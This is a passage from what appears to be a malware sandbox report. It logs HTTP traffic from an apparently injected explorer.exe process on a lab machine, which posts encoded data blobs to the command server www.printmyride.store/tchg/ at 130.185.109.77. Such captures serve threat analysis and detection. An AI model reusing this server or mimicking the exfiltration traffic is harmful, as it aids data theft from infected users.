                                                                                                                    Data Ascii: O0qEM=YjWtulgkPFiNRt3TPM(TCbuAUOVEvk1Si6gD0RDOBxLpIKuZlBKTUVKM4HT60zlj~YHpNiFceJDDYnN1mqf1iWE8JG8r40I6Ll5TAA83r-V8WSrQoi1k0PzuhHWZTzxOZHtRuZplSjKEAs1dDk~F3-KEUHVjs4Hs9_Z0uFGpl7RgRvbLFAQUP5LjiL1gPDmLp7aExAsmBXP3NBz5xf7zP2GqyGCVkJf8HjR8xvtckVlkx1NgFQYM9WbSrjeg4SSD7STLnuK3i2OSaG(gM4nRsMvEIUP5D6pF~m8hLaUz1ldY~fmsxZ(-cR74OBEKtuwJvpKuzds6X_0VCD0WMxRKGniVsgUYIR9kPl1C1gNXXbHtiv~MVctNr_L40MO3r7YlP5NeZVhrV6woZMgo(8u_xPn3YTfZRB~ELuHPGpwkyaQ81Z8pAGcQFwCfgtLOmIddMaKoInm-uuax8Ji7EP0NPJDdi5xjVDv4ZaUFEbOB~UVF~YUIK0FXYe0iJizJhF2_oo7jGys.
                                                                                                                    May 30, 2023 11:08:24.522293091 CEST337INHTTP/1.1 403 Forbidden
                                                                                                                    date: Tue, 30 May 2023 09:08:24 GMT
                                                                                                                    content-type: text/html
                                                                                                                    transfer-encoding: chunked
                                                                                                                    vary: Accept-Encoding
                                                                                                                    server: NginX
                                                                                                                    content-encoding: gzip
                                                                                                                    connection: close
                                                                                                                    Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    80192.168.11.2049839130.185.109.7780C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:12:31.408299923 CEST1545OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.printmyride.store
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 187
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.printmyride.store
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.printmyride.store/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 64 53 53 39 71 5f 68 49 6d 55 79 43 51 41 62 69 4e 71 63 54 34 31 63 6f 39 47 6d 6f 4d 6d 32 43 62 6d 37 73 78 66 6f 78 65 2d 70 68 77 41 5a 6b 54 6f 33 55 38 65 76 6e 6e 35 43 52 50 6d 76 4f 30 62 4e 47 6e 43 46 37 78 34 4e 42 53 5a 4a 50 71 77 6a 59 45 5a 64 4c 76 50 78 4d 52 45 4e 33 4c 42 31 70 46 59 39 54 74 37 66 5a 75 5f 48 46 4d 73 66 37 42 59 67 57 6d 68 75 30 7a 75 75 58 75 5a 46 79 56 71 68 59 71 32 42 64 55 31 4e 36 7e 35 43 59 4e 6b 64 59 5a 4e 34 57 5a 79 6e 61 75 54 58 33 4d 6c 6e 78 45 6e 59 46 70 33 65 58 46 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=dSS9q_hImUyCQAbiNqcT41co9GmoMm2Cbm7sxfoxe-phwAZkTo3U8evnn5CRPmvO0bNGnCF7x4NBSZJPqwjYEZdLvPxMREN3LB1pFY9Tt7fZu_HFMsf7BYgWmhu0zuuXuZFyVqhYq2BdU1N6~5CYNkdYZN4WZynauTX3MlnxEnYFp3eXFQ).
                                                                                                                    May 30, 2023 11:12:31.419176102 CEST1545INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.6.2
                                                                                                                    Date: Tue, 30 May 2023 09:12:31 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    81192.168.11.2049840130.185.109.7780C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:12:33.939418077 CEST1546OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.printmyride.store
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 527
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.printmyride.store
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.printmyride.store/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 64 53 53 39 71 5f 68 49 6d 55 79 43 52 67 72 69 49 4a 45 54 78 31 63 72 79 6d 6d 6f 46 47 32 4f 62 6d 48 73 78 65 73 68 65 4d 64 68 77 69 78 6b 53 70 33 55 39 65 76 6e 73 5a 43 75 51 32 76 5f 30 62 78 34 6e 44 35 37 78 38 64 42 55 71 78 50 39 77 6a 62 63 70 64 49 28 5f 78 50 61 6b 4e 74 4c 42 4a 44 46 5a 5a 54 74 49 62 5a 70 39 28 46 66 4e 66 34 46 34 67 51 67 68 75 31 6d 65 75 6a 75 5a 42 4d 56 6f 77 6a 71 46 64 64 56 56 74 36 28 35 43 58 61 6b 64 66 45 64 35 53 4a 6d 28 56 76 42 28 5a 5a 41 44 76 41 32 5a 64 6a 43 33 53 48 4f 54 5f 32 37 46 30 7e 64 76 4e 6a 36 49 47 31 4d 4d 61 67 31 69 32 68 50 6a 4d 44 62 45 4a 69 59 31 52 4c 72 41 4b 43 39 75 33 47 64 6d 42 6b 6d 42 4b 56 32 38 68 65 6d 58 51 63 53 61 34 4c 39 65 6b 41 76 76 61 74 30 49 56 4b 4a 58 79 77 74 4b 70 51 57 35 4c 50 36 35 46 61 39 4b 4a 71 6e 35 61 4b 76 66 58 58 50 64 79 6c 35 4b 32 73 53 4d 42 31 6a 65 78 66 6c 4d 44 48 39 4c 63 44 46 7a 30 66 38 42 68 54 48 67 57 42 5a 72 64 72 54 44 76 72 50 28 32 4e 61 41 5f 48 66 6b 75 4e 56 4b 61 33 67 4e 64 61 6f 33 59 43 32 68 52 53 6b 36 59 33 51 72 44 75 34 74 57 6d 46 55 47 62 64 45 69 78 36 50 6b 4e 70 50 6f 63 73 30 70 64 56 69 53 58 65 77 47 6e 37 6e 33 36 71 75 52 6c 51 74 6f 54 31 61 74 59 79 37 44 34 2d 7e 77 69 6d 46 74 74 43 36 39 58 4c 4b 66 4f 44 55 4c 67 2d 74 61 53 30 64 4a 65 4b 77 58 79 68 73 4a 28 37 71 55 7a 6f 7e 66 44 6d 32 71 6b 45 6c 5a 36 36 28 62 36 39 66 35 59 37 76 73 79 69 4c 5f 37 47 47 31 56 6e 5a 2d 4e 74 5a 75 34 48 6b 47 41 51 69 4e 71 7a 54 6f 72 55 54 41 61 4b 6f 6b 33 4f 6c 61 64 61 63 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=dSS9q_hImUyCRgriIJETx1crymmoFG2ObmHsxesheMdhwixkSp3U9evnsZCuQ2v_0bx4nD57x8dBUqxP9wjbcpdI(_xPakNtLBJDFZZTtIbZp9(FfNf4F4gQghu1meujuZBMVowjqFddVVt6(5CXakdfEd5SJm(VvB(ZZADvA2ZdjC3SHOT_27F0~dvNj6IG1MMag1i2hPjMDbEJiY1RLrAKC9u3GdmBkmBKV28hemXQcSa4L9ekAvvat0IVKJXywtKpQW5LP65Fa9KJqn5aKvfXXPdyl5K2sSMB1jexflMDH9LcDFz0f8BhTHgWBZrdrTDvrP(2NaA_HfkuNVKa3gNdao3YC2hRSk6Y3QrDu4tWmFUGbdEix6PkNpPocs0pdViSXewGn7n36quRlQtoT1atYy7D4-~wimFttC69XLKfODULg-taS0dJeKwXyhsJ(7qUzo~fDm2qkElZ66(b69f5Y7vsyiL_7GG1VnZ-NtZu4HkGAQiNqzTorUTAaKok3Oladac.
                                                                                                                    May 30, 2023 11:12:33.951101065 CEST1547INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.6.2
                                                                                                                    Date: Tue, 30 May 2023 09:12:33 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    82192.168.11.2049841130.185.109.7780C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:12:36.469614983 CEST1560OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.printmyride.store
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 51815
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.printmyride.store
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.printmyride.store/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 64 53 53 39 71 5f 68 49 6d 55 79 43 52 67 72 69 49 4a 45 54 78 31 63 72 79 6d 6d 6f 46 47 32 4f 62 6d 48 73 78 65 73 68 65 4d 6c 68 77 52 4a 6b 64 71 66 55 6e 65 76 6e 6c 35 43 56 51 32 76 59 30 66 6c 30 6e 44 31 72 78 2d 56 42 55 38 74 50 39 44 62 62 5a 70 64 4e 36 5f 78 4e 52 45 4e 35 4c 42 31 58 46 64 49 6f 74 34 76 5a 75 36 37 46 64 4f 48 37 4a 49 67 57 67 68 75 78 73 2d 75 42 75 5a 4e 63 56 6f 38 6a 71 48 70 64 56 6e 6c 36 34 75 65 58 41 45 64 63 52 74 35 6e 53 32 7e 72 76 42 37 4e 5a 41 44 56 41 33 64 64 6a 45 33 53 57 35 6e 38 32 62 46 30 67 74 76 4f 6e 36 45 4b 31 4d 68 5a 67 31 6d 32 68 4e 6a 4d 52 4c 45 4a 6d 38 68 51 43 72 41 4d 50 64 76 76 43 64 69 4a 6b 6d 46 30 56 30 77 68 65 32 54 51 63 68 79 34 49 66 32 6b 63 66 76 59 69 55 49 64 66 35 58 55 77 74 36 44 51 58 5a 68 50 36 74 46 62 66 53 4a 28 7a 6c 62 61 66 66 56 59 76 63 79 6f 5a 4f 45 73 53 38 64 31 6a 66 30 66 68 38 44 47 4f 44 63 41 45 7a 7a 63 73 42 6d 62 6e 67 35 4c 35 58 74 72 54 76 52 72 50 32 7a 4e 5a 73 5f 45 5f 6b 75 64 6d 53 5a 35 51 4e 61 57 49 32 48 47 32 68 47 53 6b 33 78 33 53 48 54 76 49 42 57 6e 78 34 47 49 64 45 6a 36 36 50 67 55 35 50 75 4e 38 30 70 64 56 6d 67 58 65 30 47 6d 4b 50 33 72 4b 65 52 75 6e 35 6f 66 56 61 6a 59 79 37 53 34 2d 79 44 69 6e 38 4d 74 42 79 58 58 4a 6d 66 4a 53 45 4c 68 37 52 46 46 45 64 4d 61 4b 77 6d 76 78 77 6b 28 36 47 63 7a 72 57 70 45 57 61 71 6e 45 56 5a 7e 36 28 59 34 64 66 2d 5a 37 76 41 32 69 57 6d 37 47 71 45 56 6e 45 7a 4e 76 5a 75 35 7a 4e 33 62 44 65 69 78 52 58 43 6b 6a 66 6a 56 72 51 49 75 5f 31 6c 45 64 7a 76 34 42 4f 72 6c 56 59 56 77 54 37 4b 4e 2d 39 43 79 45 65 56 53 54 55 61 42 61 41 74 4e 52 72 76 54 5f 63 39 6c 7a 76 4e 51 4b 69 62 33 43 6e 5a 47 33 73 53 63 6c 53 72 33 31 28 77 59 56 7a 6d 38 61 41 62 55 6a 43 55 30 4b 72 49 6c 4b 7a 64 69 4e 49 65 54 4b 38 6b 47 46 39 5f 61 56 4c 57 63 64 6e 33 4d 68 28 6f 7e 45 6d 32 7e 43 44 44 65 4b 71 31 76 2d 6d 58 66 64 52 39 6e 77 31 6c 77 72 57 71 69 6f 7e 36 7a 6b 77 38 6d 74 71 57 62 44 37 43 34 55 6c 37 66 6d 28 38 36 4d 4c 51 75 47 4f 6f 73 6b 6f 64 39 50 31 75 44 4a 49 43 46 30 37 63 79 5f 6d 41 36 78 57 43 50 75 78 74 4b 49 77 38 4e 43 58 63 45 76 28 39 6d 68 56 32 6c 74 78 32 47 44 7e 39 44 76 6b 69 30 46 37 57 62 73 4b 7a 58 64 65 36 47 69 78 44 49 31 62 7a 67 51 4a 46 33 38 7a 6b 54 6b 4a 66 55 2d 71 55 57 30 39 46 28 4a 71 50 5a 43 52 69 6d 51 37 70 39 58 39 4f 77 77 74 52 4c 45 76 31 76 74 28 74 41 69 4c 76 50 33 37 54 43 30 68 62 42 55 70 78 4e 67 72 75 68 42 70 77 74 69 72 74 7a 62 30 36 4b 6c 58 7a 4e 71 53 38 72 7a 6b 41 72 50 74 59 36 31 5a 34 47 58 46 41 4e 49 4a 58 54 71 73 43 5a 6e 55 4b 65 44 45 61 32 6d 4c 68 43 4a 6e 31 67 58 62 30 53 6d 46 5a 63 46 46 5a 36 4e 59 54 46 6e 28 76 41 50 42 6e 34 65 37 76 78 62 32 74 63 62 48 77 6b 51 58 63 49 37 39 46 78 6a 54 62 62 2d 28 6c 6c 63 4c 5a 6b 56 56 59 6b 63 33 43 75 38 61 6a 52 63 4f 33 35 63 53 62 6c 57 58 59 73 43 73 7a 66 4d 4f 65 64 68 58 32 77 75 31 48 39 44 31 78 4b 55 62 69 31 77 6e 66 6e 79 49 79 4a 30 64 75 28 66 79 4f 6d 69 6d 51 46 56 6e 56 50 63 57 61 74 76 36 37 48 37 32 4c 4e 76 57 75 49 44 67 4e 45 64 45 65 77 63 31 48 55 44 7a 70 36 31 57 32 56 37 68 4a 34 2d 4f 49 6e 4f 52 47 73 58 69 47 7e 71 71 39 43 5a 73 63 4c 69 6e 6e 53 78 48 42 41 74 61 33 55 74 63 37 46 4c 66 49 43 6b 39 79 4f 78 58 41 36 30 4b 2d 6e 77 43 56 56 39 78 69 72 70 45 71 56 39 45 66 6e 58 36 59 6e 6f 4b 36 48 33 6e 42 35 44 43 34 44 64 52 79 45 73 46 6d 42 42 78 51 58 6d 53 39 72 52 43 39 6a 71 55 62 62 4e 61 79 79 47 68 4d 33 50 55 63 50 67 75 31 66 43 74 4a 4b 5a 51 4a 74 33 54 53 62 62 38 74 67 47 7a 4c 41 36 62 63 56 48 66 64 47 6f 68 59 5a 53 4d 41 79 74 79 72 46 63 54 44 74 6d 56 57 46 65 36 53 4a 65 46 44 31 4b 61 36 30 66 30 6f 62 5a 37 4e 6f 5f 37 6a 43 58 41 42 44 49 39 53 70 67 74 31 75 79 47 79 7e 38 51 68 51 58 45 4f 46 4e 47 49 52 5a 4c 67 6a 30 49 6c 57 30 4b 48 53 70 70 66 62 5a 68 39 61 45 35 30 4c 62 55 6e 64 5f 51 64 6d 73 73 58 4e 36 48 7a 78 53 4d 6d 75 53 35 59 68 67 65 46 4c 61 6f 58 7e 66 71 73 56 6f 71 42 30 35 74 78 78 6d 51 55 43 72 46 4d 36
                                                                                                                    Data Ascii: O0qEM=dSS9q_hImUyCRgriIJETx1crymmoFG2ObmHsxesheMlhwRJkdqfUnevnl5CVQ2vY0fl0nD1rx-VBU8tP9DbbZpdN6_xNREN5LB1XFdIot4vZu67FdOH7JIgWghuxs-uBuZNcVo8jqHpdVnl64ueXAEdcRt5nS2~rvB7NZADVA3ddjE3SW5n82bF0gtvOn6EK1MhZg1m2hNjMRLEJm8hQCrAMPdvvCdiJkmF0V0whe2TQchy4If2kcfvYiUIdf5XUwt6DQXZhP6tFbfSJ(zlbaffVYvcyoZOEsS8d1jf0fh8DGODcAEzzcsBmbng5L5XtrTvRrP2zNZs_E_kudmSZ5QNaWI2HG2hGSk3x3SHTvIBWnx4GIdEj66PgU5PuN80pdVmgXe0GmKP3rKeRun5ofVajYy7S4-yDin8MtByXXJmfJSELh7RFFEdMaKwmvxwk(6GczrWpEWaqnEVZ~6(Y4df-Z7vA2iWm7GqEVnEzNvZu5zN3bDeixRXCkjfjVrQIu_1lEdzv4BOrlVYVwT7KN-9CyEeVSTUaBaAtNRrvT_c9lzvNQKib3CnZG3sSclSr31(wYVzm8aAbUjCU0KrIlKzdiNIeTK8kGF9_aVLWcdn3Mh(o~Em2~CDDeKq1v-mXfdR9nw1lwrWqio~6zkw8mtqWbD7C4Ul7fm(86MLQuGOoskod9P1uDJICF07cy_mA6xWCPuxtKIw8NCXcEv(9mhV2ltx2GD~9Dvki0F7WbsKzXde6GixDI1bzgQJF38zkTkJfU-qUW09F(JqPZCRimQ7p9X9OwwtRLEv1vt(tAiLvP37TC0hbBUpxNgruhBpwtirtzb06KlXzNqS8rzkArPtY61Z4GXFANIJXTqsCZnUKeDEa2mLhCJn1gXb0SmFZcFFZ6NYTFn(vAPBn4e7vxb2tcbHwkQXcI79FxjTbb-(llcLZkVVYkc3Cu8ajRcO35cSblWXYsCszfMOedhX2wu1H9D1xKUbi1wnfnyIyJ0du(fyOmimQFVnVPcWatv67H72LNvWuIDgNEdEewc1HUDzp61W2V7hJ4-OInORGsXiG~qq9CZscLinnSxHBAta3Utc7FLfICk9yOxXA60K-nwCVV9xirpEqV9EfnX6YnoK6H3nB5DC4DdRyEsFmBBxQXmS9rRC9jqUbbNayyGhM3PUcPgu1fCtJKZQJt3TSbb8tgGzLA6bcVHfdGohYZSMAytyrFcTDtmVWFe6SJeFD1Ka60f0obZ7No_7jCXABDI9Spgt1uyGy~8QhQXEOFNGIRZLgj0IlW0KHSppfbZh9aE50LbUnd_QdmssXN6HzxSMmuS5YhgeFLaoX~fqsVoqB05txxmQUCrFM6yP9L2mIn7wShcFgHXMDnszN9OgDFOAz3Q7VhrVFopLZ~4vQPR1SBWzjXL3rVYtND60bV9FUAwAMkGhD6Z0RK-lAzoxCweXKEONO~ouLAkMlbLXQSFPwIbr1RG8NO9ICZrRRQu(bU3RJgywhWQ8L9HQ1N23xEif9Y24D4ntMsVQ1iYEfwMWNWVgV0diVQW9iF3C9iRfDmd~seNWFP5d0UvWZj_2sDRB7B1kgTGgrTIcfFBk9~_0e4HlnqKvnpP3CZbZBwAgzp4IA9jPkOiWDr-Z188R1uFtPh8Ycaj7lQ6DlCMOrGc6uSQYNOqClEVnIRH4CO0YfCHhc1qhqmy6m4FhjpDsYZ5xdL4BSTGEuGn8V5Sl2pRLSfvoOY0~LCigPYZs14hrLYsQD04aLxZFKnt1H7GapXK93pcFenG0Jf3bHmX8pkjsjrIqW50LqxzSDNRyDFnBS5fD48I0KCG0x1tTrwEc3KGqeClvGs2iuKotnJD23uTdW5nUmkRD1yMX_0lJA8r2CDkvQbCuuBqinYAaiQXZNWFQOvQRR8OTvt5kC8jI8N8TZf80HLNVOGaCX7hfsN8ZxYz9PbkCSAqmlGPCwIJ0NtelkapWt0IIPBevJi5jdZq1FUnDD0GtJ~2YsaJSzOAi7VjlnNGZ2xD2MwnyzzcR0S-jkrEifGpn0H8X_kgqeq7kwX5OktjGO6xiKANcHzLV2827FeD262xnWcD(PGQvMhvT3e6NCFSB4jgaOyCKL23LCDhBrJE5-zNtTVnoZeZ48eHh1Bp80Rn6fIYmR4KKiIvMOGzGPwfSnXHExmyLQa2UyWUsvy5oP3QZHb_~mQ3dQRIs_vxuQx1wg5F2bS3vlZa9KeD6v~mjuxlonZVl3pD9hc3fXzMz-3H~3PGrw1A5RHQA8Rp0ZMB8ymtR5SNFi8OoopTb73IN4fJEBjxrQADky5p0LRbK2TYvNp4B8l27hpvi95AKkDjH9kornQTh3bZOG(fHAGRIT8484luCQRRadq9JYnlXrNxQ9UgbVyp0_EqyMAwrKydzMKHDLBWG0wGoPkZ~GGefu8BwpUXlnjnj9n_gTUgC6PtcXn69nZz5DosGH7OrPE9L7hR310Ph-hxVXq9Gdjw5oj4grizoYMfsuKnYYISjFiEJfJqfuHyAZd-bDcjT3uXuoNc0ZAgo20xxI6B9JPpMc4gkkmZLeS1N8uA8otWgpydF-4noKS-xxSrhOmXsMaYoZvNDpKvuJd6GoBMrQ7iqmhW5Sn4QB1W0lqvfNGOJHIfefgjD5Gl0lmtujQeLlPCM2KRiIDMD_ZMa-7eFrZoiFGaGfoMHWpVMMIk4tf-v4q5x8O1B_I6qi1fsE~pqpr-W212oaqLlTWlHkBvK5Ukx5Q7Iaxls5a9MRh5H6qpZaWtCq0sw33TzjIdyI3g5QXL3S9I6F0i5JIfizOhH-yj2mK1e-oI5r0ZGFEMQKDrXdmiYCWVWBx8HjxbdUoMWiDqfqzhGUms(o2tsJPqJW0uzNtgm2yw(b5ilOk93vjfVHTXcvVCvMd2~hx43zBdyrWD5_dkGBlhwhXIZITGUWAZBerZNPkcevnHMdomuxxmI4c9aPko6SnXMtIbsrzEDk~Ry5j6oaeJpuRsO4rJrHMkcJyOqA(dYPEc0liiwMe0uCUPsTJtO0HMV9AN9vROz-X4EcZH4uUn~-HeCsyBCCc3(jAe0JSIuHxMVXq0l7MxJg0PRyb1F7xlFrY9406Jj_WTR53-~ZaVhVwLwu2D92d2zVSNL6WWRk6_DdtXvjxucrTn4B4PMRFbTDT9MC0_a3l_py5ZG_wO6cTftsDN5o1wD61Ne946lrn_ETE_elPsJq3rG99sScuPKwuRBj4-3Hjlt1~IsdtRVK6hsz~4MihbjC6cGRYAexNE6EGpD0uvQvMbjHqYxULMLO8huUyYScLPWhoRTk1Lg9fmereZC2YMWzvwp12tep8VXt4K5t~ywUzwlJBVHW3GLytmGHTTq79mTFkt5ehClWHgB3G-(LP1gZxLlz1VaJQJwdRzI22CYlii~JmxG5RztCSsrb6zFPEfJP3KvU6mjqwxqQ9rYM3SErWKMf1adKXJQ5b4eagywlL96frjMY336JLJG2E9y1B_NricPX5APT5HsTrzVqgZf-aNPVi-d9IjxYW1~W91dT2hE71Zg5MbESVpeAv_YLXL3RIR5niMcWUAsrEMqyiivX1J5Kas9Ehrox0RKe0nfF1dBVnrOJjd0yg-CmEDQbYi9OxB6kxu8v~AxpuwkWDUplmOUCMD7mNEGj3Os8OF6PmNXs1igDc6vNDazgKC0T7vKpaphMVX~EIY8KRsd7ijFPmYq8i9mbjnGmtvt5pxKSloqh7vaLWEhuqkwdUq9XjhgB(rzKo23-xDXX2YVpE2r2OKIEI_DxGQqPZaGQI_h1OJhCyOx4M_1ip0KnYxXquV3ZBxbqEzvw2nKqDAOXV27ItKsJO1tCDU~Xo-uGpWcJkgSrI9kTQE3GFy7YZzaPi-6IPyWW8wxkNJhNZXGkqYLJVCm7E1xVSTlIdLBdOLfu7VGaU7GEz9YfChF-dYRfDJCO4-ew0kIYvDdLZ4LNp0QD2h9dw0bCJxDvQwOW97jkg6xA4VtKTt41NDF68VKSnDm0XFxFGOBxSPg6TOzKuVZR4z2VQWNDRrpclFcY5S43TVqcLXOgOtSk8Pr5okFjFIIB5tfeEcg0yG0uyhB0
                                                                                                                    May 30, 2023 11:12:36.480197906 CEST1560INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.6.2
                                                                                                                    Date: Tue, 30 May 2023 09:12:36 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0
                                                                                                                    May 30, 2023 11:12:36.480214119 CEST1561OUTData Raw: 68 7a 4b 36 65 30 4f 65 7a 4a 57 32 38 4c 6f 6a 74 6d 39 42 6e 38 69 4d 44 45 79 31 6f 52 47 42 5a 57 6e 31 31 49 72 55 54 34 59 67 34 7a 6b 48 57 7a 4a 39 74 55 46 44 37 50 50 55 4a 57 71 4a 4e 28 56 6c 44 32 31 4f 4a 37 41 53 5f 76 6b 75 74 61
                                                                                                                    Data Ascii: hzK6e0OezJW28Lojtm9Bn8iMDEy1oRGBZWn11IrUT4Yg4zkHWzJ9tUFD7PPUJWqJN(VlD21OJ7AS_vkutaRvaFR54cpkRr-REqW1qphRvOLB60OF8zfmNnQIg~VI1Joh4O6iDscAaPGE_mMg1babIvCxbZfuZf3QexB6rk-DIH932RmSLwxTHJj5s9SsRH8qmd4uX59ux239loXg_DOe24pirEsvGrk1zathUSWpzvpPMlmL8W3
                                                                                                                    May 30, 2023 11:12:36.480386972 CEST1564OUTData Raw: 32 68 36 39 67 7e 71 46 50 71 74 62 7a 34 77 78 56 61 59 41 33 52 4e 72 77 35 38 38 79 69 34 30 52 74 76 4b 4f 79 34 67 34 51 52 6a 6a 65 5f 45 65 34 6a 37 72 32 6c 72 62 6d 55 64 52 39 4c 4f 76 49 78 33 6f 78 7a 67 52 56 68 33 4d 74 4d 4c 31 38
                                                                                                                    Data Ascii: 2h69g~qFPqtbz4wxVaYA3RNrw588yi40RtvKOy4g4QRjje_Ee4j7r2lrbmUdR9LOvIx3oxzgRVh3MtML18atyUlUwy4tbp1w3MZD2yOjEYee9f_0HgR8tyHBNW9xWuyuIvGAUz_e-nxSuzEb-mG7fs1sF1Bgo2YE_zgenTkfYsdwL(Tln3t3gfh8r(dih4B4-pmD2QHaEM0jzzakzEnt51FtLqSfx(pm1W7k7ZUBsuztsjzYF8c
                                                                                                                    May 30, 2023 11:12:36.480588913 CEST1565OUTData Raw: 42 64 54 50 6a 55 58 34 38 35 50 6e 39 68 5f 6c 54 51 76 70 76 76 38 4f 39 35 6b 4e 32 66 67 28 66 4d 74 4e 6d 7e 52 42 4f 6d 38 33 45 6e 79 43 31 71 5f 6f 58 62 65 67 6f 79 73 6f 52 72 61 57 74 4e 6b 38 6e 42 6e 43 41 5a 70 4b 73 4e 37 55 4a 37
                                                                                                                    Data Ascii: BdTPjUX485Pn9h_lTQvpvv8O95kN2fg(fMtNm~RBOm83EnyC1q_oXbegoysoRraWtNk8nBnCAZpKsN7UJ7R17ChuF7vIqsU8i27jhX_gxh8vWFg83vCXq1AIXjQXis853cfu7tRM_6U7nFPKAfoaYu5wR8eQ24AAdQ0yn(ZSNHI6mqYBKcoT-iOR0RMEZoEkymZJP9f4MVuAmpQZy18EaRgAY3g2EmOX3Cl1ysBRf9OqHuWliBX
